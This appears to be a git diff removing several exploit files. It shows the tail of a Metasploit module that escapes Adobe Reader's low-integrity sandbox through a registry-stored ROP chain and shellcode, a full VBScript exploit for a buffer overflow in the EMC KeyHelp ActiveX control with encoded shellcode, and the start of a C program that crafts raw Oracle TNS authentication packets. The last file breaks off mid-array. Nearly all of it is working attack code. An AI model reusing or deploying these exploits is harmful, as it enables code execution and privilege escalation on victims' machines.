mem_contents = session.railgun.memread(mem, length)
|
||||
return mem_contents.index(pattern)
|
||||
end
|
||||
|
||||
# Search for gadgets on ntdll.dll
|
||||
def search_gadgets
|
||||
ntdll_text_base = 0x10000
|
||||
search_length = 0xd6000
|
||||
|
||||
@gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3")
|
||||
if @gadgets['mov [edi], ecx # ret'].nil?
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'")
|
||||
end
|
||||
@gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']
|
||||
@gadgets['mov [edi], ecx # ret'] += ntdll_text_base
|
||||
vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}")
|
||||
|
||||
@gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2
|
||||
vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}")
|
||||
|
||||
@gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3")
|
||||
if @gadgets['pop edi # ret'].nil?
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'")
|
||||
end
|
||||
@gadgets['pop edi # ret'] += @addresses['ntdll.dll']
|
||||
@gadgets['pop edi # ret'] += ntdll_text_base
|
||||
vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}")
|
||||
|
||||
@gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3")
|
||||
if @gadgets['pop ecx # ret'].nil?
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'")
|
||||
end
|
||||
@gadgets['pop ecx # ret'] += @addresses['ntdll.dll']
|
||||
@gadgets['pop ecx # ret'] += ntdll_text_base
|
||||
vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
|
||||
end
|
||||
|
||||
def store(buf, data, address)
|
||||
i = 0
|
||||
while (i < data.length)
|
||||
buf << [@gadgets['pop edi # ret']].pack("V")
|
||||
buf << [address + i].pack("V") # edi
|
||||
buf << [@gadgets['pop ecx # ret']].pack("V")
|
||||
buf << data[i, 4].ljust(4,"\x00") # ecx
|
||||
buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
|
||||
i = i + 4
|
||||
end
|
||||
return i
|
||||
end
|
||||
|
||||
def create_rop_chain
|
||||
mem = 0x0c0c0c0c
|
||||
|
||||
buf = [0x58000000 + 1].pack("V")
|
||||
buf << [0x58000000 + 2].pack("V")
|
||||
buf << [0].pack("V")
|
||||
buf << [0x58000000 + 4].pack("V")
|
||||
|
||||
buf << [0x58000000 + 5].pack("V")
|
||||
buf << [0x58000000 + 6].pack("V")
|
||||
buf << [0x58000000 + 7].pack("V")
|
||||
buf << [@gadgets['ret']].pack("V")
|
||||
buf << rand_text(8)
|
||||
|
||||
# Allocate Memory To store the shellcode and the necessary data to read the
|
||||
# shellcode stored in the registry
|
||||
buf << [@addresses['VirtualAlloc']].pack("V")
|
||||
buf << [@gadgets['ret']].pack("V")
|
||||
buf << [mem].pack("V") # lpAddress
|
||||
buf << [0x00010000].pack("V") # SIZE_T dwSize
|
||||
buf << [0x00003000].pack("V") # DWORD flAllocationType
|
||||
buf << [0x00000040].pack("V") # flProtect
|
||||
|
||||
# Put in the allocated memory the necessary data in order to read the
|
||||
# shellcode stored in the registry
|
||||
# 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
|
||||
reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
|
||||
reg_key_length = store(buf, reg_key, mem)
|
||||
# 2) The reg entry: shellcode
|
||||
value_key = "shellcode\x00"
|
||||
store(buf, value_key, mem + reg_key_length)
|
||||
# 3) The output buffer size: 0x3000
|
||||
size_buffer = 0x3000
|
||||
buf << [@gadgets['pop edi # ret']].pack("V")
|
||||
buf << [mem + 0x50].pack("V") # edi
|
||||
buf << [@gadgets['pop ecx # ret']].pack("V")
|
||||
buf << [size_buffer].pack("V") # ecx
|
||||
buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
|
||||
|
||||
# Copy the shellcode from the the registry to the
|
||||
# memory allocated with executable permissions and
|
||||
# ret into there
|
||||
buf << [@addresses['RegGetValueA']].pack("V")
|
||||
buf << [mem + 0x1000].pack("V") # ret to shellcode
|
||||
buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER
|
||||
buf << [mem].pack("V") # lpSubKey
|
||||
buf << [mem + 0x3c].pack("V") # lpValue
|
||||
buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY
|
||||
buf << [0].pack("V") # pdwType
|
||||
buf << [mem + 0x1000].pack("V") # pvData
|
||||
buf << [mem + 0x50].pack("V") # pcbData
|
||||
end
|
||||
|
||||
# Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry
|
||||
def store_data_registry(buf)
|
||||
vprint_status("Creating the Registry Key to store the shellcode...")
|
||||
|
||||
if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
|
||||
vprint_good("Registry Key created")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode")
|
||||
end
|
||||
|
||||
vprint_status("Storing the shellcode in the Registry...")
|
||||
|
||||
if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY")
|
||||
vprint_good("Shellcode stored")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry")
|
||||
end
|
||||
|
||||
# Create the Malicious registry entry in order to exploit....
|
||||
vprint_status("Creating the Registry Key to trigger the Overflow...")
|
||||
if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
|
||||
vprint_good("Registry Key created")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow")
|
||||
end
|
||||
|
||||
vprint_status("Storing the trigger in the Registry...")
|
||||
if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY")
|
||||
vprint_good("Trigger stored")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry")
|
||||
end
|
||||
end
|
||||
|
||||
def trigger_overflow
|
||||
vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...")
|
||||
# Create a thread in order to execute the necessary code to launch AdobeCollabSync
|
||||
ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil)
|
||||
if ret['return'] < 1
|
||||
print_error("Unable to CreateThread")
|
||||
return
|
||||
end
|
||||
hthread = ret['return']
|
||||
|
||||
vprint_status("Resuming the Thread...")
|
||||
# Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!
|
||||
ret = client.railgun.kernel32.ResumeThread(hthread)
|
||||
if ret['return'] < 1
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread")
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
@addresses = {}
|
||||
acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
|
||||
@addresses['AcroRd32.exe'] = acrord32["return"]
|
||||
if @addresses['AcroRd32.exe'] == 0
|
||||
return Msf::Exploit::CheckCode::Unknown
|
||||
elsif check_trigger
|
||||
return Msf::Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
return Msf::Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
@addresses = {}
|
||||
@gadgets = {}
|
||||
|
||||
print_status("Verifying we're in the correct target process...")
|
||||
acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
|
||||
@addresses['AcroRd32.exe'] = acrord32["return"]
|
||||
if @addresses['AcroRd32.exe'] == 0
|
||||
fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found")
|
||||
end
|
||||
vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}")
|
||||
|
||||
print_status("Checking the AcroRd32.exe image...")
|
||||
if not check_trigger
|
||||
fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target")
|
||||
end
|
||||
|
||||
print_status("Checking the Process Integrity Level...")
|
||||
if not low_integrity_level?
|
||||
fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level")
|
||||
end
|
||||
|
||||
print_status("Collecting necessary addresses for exploit...")
|
||||
collect_addresses
|
||||
|
||||
print_status("Searching the gadgets needed to build the ROP chain...")
|
||||
search_gadgets
|
||||
print_good("Gadgets collected...")
|
||||
|
||||
print_status("Building the ROP chain...")
|
||||
buf = create_rop_chain
|
||||
print_good("ROP chain ready...")
|
||||
|
||||
print_status("Storing the shellcode and the trigger in the Registry...")
|
||||
store_data_registry(buf)
|
||||
|
||||
print_status("Executing AdobeCollabSync.exe...")
|
||||
trigger_overflow
|
||||
end
|
||||
end
|
|
@ -1,60 +0,0 @@
|
|||
<!--
|
||||
EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote
|
||||
buffer overflow exploit
|
||||
(ie8 xp sp3)
|
||||
by Nine:Situations:Group::pyrokinesis
|
||||
site: http://retrogod.altervista.org/
|
||||
|
||||
tested products:
|
||||
EMC Captiva QuickScan Pro 4.6 sp1
|
||||
EMC Documentum ApllicationXtender Desktop 5.4
|
||||
and possibly other products carrying quickscan
|
||||
|
||||
|
||||
CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
|
||||
Progid: KeyHelp.KeyCtrl.1
|
||||
Binary Path: C:\WINDOWS\system32\KeyHelp.ocx
|
||||
KillBitted: False
|
||||
Implements IObjectSafety: True
|
||||
Safe For Initialization (IObjectSafety): True
|
||||
Safe For Scripting (IObjectSafety): True
|
||||
|
||||
JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow
|
||||
eip is overwritten after 537 bytes through the second argument, you can touch SEH even
|
||||
-->
|
||||
<html>
|
||||
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
|
||||
</object>
|
||||
<script language='vbscript'>
|
||||
//executing calc
|
||||
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
|
||||
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
|
||||
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
|
||||
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
|
||||
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
|
||||
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
|
||||
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
|
||||
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
|
||||
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
|
||||
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
|
||||
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
|
||||
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
|
||||
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
|
||||
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
|
||||
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
|
||||
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
|
||||
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
|
||||
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
|
||||
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
|
||||
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
|
||||
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
|
||||
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
|
||||
jnk = string(537,"A")
|
||||
eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll
|
||||
nop = string(16,unescape("%90"))
|
||||
mapID=1
|
||||
pstrChmFile= jnk + eip + nop + scode
|
||||
pstrFrame="aaaaaaaa"
|
||||
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
|
||||
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
|
||||
</script>
|
|
@ -1,386 +0,0 @@
|
|||
#include <winsock2.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <windows.h>
|
||||
#include <assert.h>
|
||||
|
||||
#include <string>
|
||||
|
||||
void s_send (SOCKET s, char *msg, DWORD size)
|
||||
{
|
||||
int sent;
|
||||
|
||||
printf ("s_send: begin: %d bytes\n", size);
|
||||
|
||||
sent=send (s, (char*)msg, size, 0);
|
||||
|
||||
if (sent==SOCKET_ERROR)
|
||||
{
|
||||
printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
|
||||
} else
|
||||
|
||||
if (sent!=size)
|
||||
printf ("sent only %d bytes\n", sent);
|
||||
|
||||
printf ("s_send: end\n");
|
||||
};
|
||||
|
||||
void s_recv (SOCKET s)
|
||||
{
|
||||
char buf[20000];
|
||||
int r;
|
||||
|
||||
struct timeval t;
|
||||
fd_set fd;
|
||||
|
||||
t.tv_sec=0;
|
||||
t.tv_usec=100000; // 100 ms
|
||||
|
||||
printf ("s_recv: begin\n");
|
||||
|
||||
FD_ZERO(&fd);
|
||||
FD_SET(s, &fd);
|
||||
|
||||
if (select (0, &fd, 0, 0, &t))
|
||||
// if (select (0, &fd, 0, 0, NULL))
|
||||
{
|
||||
r=recv (s, buf, 20000, 0);
|
||||
if (r!=0 && r!=-1)
|
||||
{
|
||||
printf ("got %d bytes\n", r);
|
||||
}
|
||||
else
|
||||
{
|
||||
printf ("connection lost, r=%d\n", r);
|
||||
};
|
||||
}
|
||||
else
|
||||
{
|
||||
printf ("select() returns zero\n");
|
||||
};
|
||||
};
|
||||
|
||||
unsigned char NSPTCN[]=
|
||||
{
|
||||
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
|
||||
0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
|
||||
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
|
||||
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
|
||||
//^^ ^^ cmd len
|
||||
0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00
|
||||
|
||||
};
|
||||
|
||||
#define NSPTCN_HEADER_LEN 58
|
||||
|
||||
unsigned char NSPTDA[]=
|
||||
{
|
||||
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
|
||||
// ^^ ^^ packet len
|
||||
0x00, 0x00
|
||||
};
|
||||
|
||||
#define NSPTDA_HEADER_LEN 10
|
||||
|
||||
void s_send_NSPTDA (SOCKET s, char *msg, int size)
|
||||
{
|
||||
char * buf;
|
||||
int sz=size + NSPTDA_HEADER_LEN;
|
||||
|
||||
buf=(char*)malloc (sz);
|
||||
|
||||
NSPTDA[0]=( sz ) >> 8;
|
||||
NSPTDA[1]=( sz ) & 0xFF;
|
||||
|
||||
memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
|
||||
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
|
||||
|
||||
printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
|
||||
|
||||
s_send (s, (char*)buf, sz);
|
||||
|
||||
free (buf);
|
||||
};
|
||||
|
||||
void s_send_TNS_command (SOCKET s, const char *cmd)
|
||||
{
|
||||
unsigned char * pkt;
|
||||
int cmd_len=strlen (cmd);
|
||||
|
||||
printf ("sending [%s]\n", cmd);
|
||||
printf ("len: %d\n", cmd_len);
|
||||
|
||||
if (cmd_len<231)
|
||||
{
|
||||
|
||||
int str_len=strlen(cmd);
|
||||
int pkt_len=str_len+58;
|
||||
|
||||
pkt=(unsigned char*)malloc (str_len+58);
|
||||
|
||||
memcpy (pkt,
|
||||
"\x00\x00\x00\x00\x01\x00\x00\x00"
|
||||
// plenH, plenL
|
||||
"\x01\x3A\x01\x2C\x00\x41\x20\x00"
|
||||
"\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
|
||||
"\x00\x00\x00\x3A\x00\x00\x02\x00"
|
||||
// cmdlenH cmdlenL
|
||||
"\x61\x61\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00", 58);
|
||||
|
||||
memcpy (pkt+58, cmd, str_len);
|
||||
|
||||
pkt[1]=pkt_len&0xFF;
|
||||
pkt[0]=(pkt_len>>8)&0xFF;
|
||||
|
||||
pkt[25]=str_len&0xFF;
|
||||
pkt[24]=(str_len>>8)&0xFF;
|
||||
|
||||
s_send (s, (char*)pkt, pkt_len);
|
||||
|
||||
free (pkt);
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
// something should be modified here in NSPTCN
|
||||
assert (0);
|
||||
};
|
||||
};
|
||||
|
||||
bool try_host (char * h)
|
||||
{
|
||||
struct hostent *hp;
|
||||
WSADATA wsaData;
|
||||
struct sockaddr_in sin;
|
||||
int r;
|
||||
struct timeval t;
|
||||
fd_set fd;
|
||||
SOCKET s;
|
||||
char pkt1318[1318];
|
||||
|
||||
WSAStartup(MAKEWORD(1, 1), &wsaData);
|
||||
|
||||
hp=gethostbyname (h);
|
||||
assert (hp!=NULL);
|
||||
|
||||
s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
|
||||
assert (s!=INVALID_SOCKET);
|
||||
|
||||
{
|
||||
u_long on=1;
|
||||
assert (ioctlsocket(s, FIONBIO, &on) != -1);
|
||||
};
|
||||
|
||||
sin.sin_family=AF_INET;
|
||||
sin.sin_port=htons(1521);
|
||||
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
|
||||
|
||||
r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
|
||||
|
||||
t.tv_sec=3;
|
||||
t.tv_usec=0;
|
||||
|
||||
FD_ZERO(&fd);
|
||||
FD_SET(s, &fd);
|
||||
|
||||
if (select (0, 0, &fd, 0, &t))
|
||||
{
|
||||
printf ("connected to %s\n", h);
|
||||
|
||||
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
|
||||
|
||||
// waiting for NSPTRS
|
||||
|
||||
s_recv(s);
|
||||
|
||||
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
|
||||
|
||||
// waiting for NSPTAC
|
||||
|
||||
s_recv(s);
|
||||
|
||||
// send NA packet
|
||||
|
||||
s_send (s,
|
||||
"\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
|
||||
"\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
|
||||
"\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
|
||||
"\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
|
||||
"\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
|
||||
"\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
|
||||
"\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
|
||||
"\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
|
||||
"\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
|
||||
"\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
|
||||
,156);
|
||||
|
||||
s_recv (s);
|
||||
|
||||
// send TTIPRO
|
||||
|
||||
s_send (s,
|
||||
|
||||
"\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
|
||||
"\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
|
||||
"\x2E\x31\x2E\x30\x00"
|
||||
, 37);
|
||||
|
||||
s_recv (s);
|
||||
|
||||
// send TTIDTY
|
||||
|
||||
s_send (s,
|
||||
|
||||
"\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
|
||||
"\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
|
||||
"\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
|
||||
"\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
|
||||
"\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
|
||||
, 75);
|
||||
|
||||
s_recv (s);
|
||||
|
||||
|
||||
// call OSESSKEY
|
||||
|
||||
s_send (s,
|
||||
|
||||
"\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
|
||||
"\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
|
||||
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
|
||||
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
|
||||
"\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
|
||||
"\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
|
||||
"\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
|
||||
"\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
|
||||
"\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
|
||||
"\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
|
||||
"\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
|
||||
"\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
|
||||
"\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
|
||||
"\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
|
||||
, 218);
|
||||
|
||||
// call OAUTH
|
||||
|
||||
memcpy (pkt1318,
|
||||
"\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
|
||||
"\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
|
||||
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
|
||||
"\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
|
||||
"\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
|
||||
"\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
|
||||
"\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
|
||||
"\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
|
||||
"\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
|
||||
"\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
|
||||
"\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
|
||||
"\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
|
||||
"\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
|
||||
"\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
|
||||
"\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
|
||||
"\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
|
||||
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
|
||||
"\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
|
||||
"\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
|
||||
"\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
|
||||
"\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
|
||||
"\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
|
||||
"\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
|
||||
"\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
|
||||
"\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
|
||||
"\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
|
||||
"\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
|
||||
"\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
|
||||
"\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
|
||||
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
|
||||
"\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
|
||||
"\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
|
||||
"\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
|
||||
"\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
|
||||
"\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
|
||||
"\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
|
||||
"\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
|
||||
"\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
|
||||
"\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
|
||||
"\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
|
||||
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
|
||||
"\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
|
||||
"\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
|
||||
"\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
|
||||
"\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
|
||||
